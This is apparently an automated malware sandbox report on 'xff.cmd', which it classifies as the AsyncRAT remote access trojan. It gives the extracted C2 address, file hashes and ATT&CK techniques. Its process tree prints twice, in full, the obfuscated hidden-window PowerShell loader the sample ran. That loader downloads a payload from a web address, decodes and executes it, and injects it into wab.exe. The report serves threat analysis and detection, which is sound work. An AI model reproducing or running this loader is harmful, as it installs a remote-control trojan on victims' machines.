Overview

overview

10

Static

static

1

xff.cmd

windows7-x64

10

xff.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 18:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    xff.cmd

  • Size

    6KB

  • MD5

    ae6a3a8912f6dd675542cc40cb5c6088

  • SHA1

    ba9cf3a09d51ab5f090fc9dac6f1253321c922e4

  • SHA256

    cfbbcd80b1537d3ba3b27a57002496542db471094bae1612abc70bac5fd80808

  • SHA512

    ac34dd4755fa9a5ba35c5c404aea505a5ef26b2ece6dc8f6bc7e65a7fc934e17af60aa208aab74fbf2719086c9e9dd0a1c85548d740967ecce27483e89778699

  • SSDEEP

    192:oeOol1MILxFMeVO+BqDwoJK7bE9COaJppuq8TH6+Q/:ocjMIdSHwowbLuqkH6+Q/

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

dhhj.duckdns.org:8797

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\xff.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
        3⤵
          PID:2664
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor( Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco ') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$ ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc ');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag ,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2508
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
            4⤵
              PID:2724
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              PID:1800

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        f629344eb397d0b1a42efe50d6ddd583

        SHA1

        dffb1052da80d7587cf988a306b840f41711f549

        SHA256

        0e511354e356cbc9e4cc42c93437d1807efa45aeb3c622a7575a99803ef50380

        SHA512

        e7f5bef9787abc01aba137e8708dbb28cc2425253d652cbe2c87d07261b7dc9a2894c9354d5c5d9ba5c57b8de2e229bf27828b3eb8a4e144b0c751322eda77c7

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Tar322F.tmp
        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Bevogtes140.Out
        Filesize

        476KB

        MD5

        6a89ec6b007920c37249774d8b8cb1e5

        SHA1

        bc34d0226a45dd3c55a5f42e5e02ece6079f3aee

        SHA256

        09fdf5a6b9e458508dd06389ca3ebbafce89a8d35b539b1a5e131c1d6ff939a7

        SHA512

        a21f562d2d2213fc981c6c08895a4e5e0b6163db49858047f720e19001de667348a630de5bab275d5973480827093da4a06d87d2b198c91336849c5576a15191

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K62Z18FFCBRGJ64WOPXE.temp
        Filesize

        7KB

        MD5

        f2b9b4b5e3bde3894339040fbbe8838a

        SHA1

        ea316590dd195de465eb039282414af2d55a7c01

        SHA256

        7ca0345482bd62414cdb0cc15dc525a8a3c546a8c3c9fd83f9c4e50fb71e090c

        SHA512

        3e717d36abf6a1805ba522de9b4a25198b8ffba4cb46fdf44d139a23de78eb17c7605abbcadc11422ab5e1405367e3536712d0e2bead709ee76975cbbeefc159

        Download Submit
      • memory/1800-89-0x0000000000B80000-0x0000000001BE2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/1800-90-0x0000000000B80000-0x0000000000B92000-memory.dmp
        Filesize

        72KB

        Download
      • memory/1800-85-0x0000000000B80000-0x0000000001BE2000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/2508-58-0x00000000064F0000-0x000000000A68C000-memory.dmp
        Filesize

        65.6MB

        Download
      • memory/2592-6-0x0000000001F70000-0x0000000001F78000-memory.dmp
        Filesize

        32KB

        Download
      • memory/2592-4-0x000007FEF566E000-0x000007FEF566F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2592-9-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2592-7-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2592-59-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2592-60-0x000007FEF566E000-0x000007FEF566F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2592-5-0x000000001B760000-0x000000001BA42000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/2592-8-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2592-11-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2592-91-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/2592-10-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp
        Filesize

        9.6MB

        Download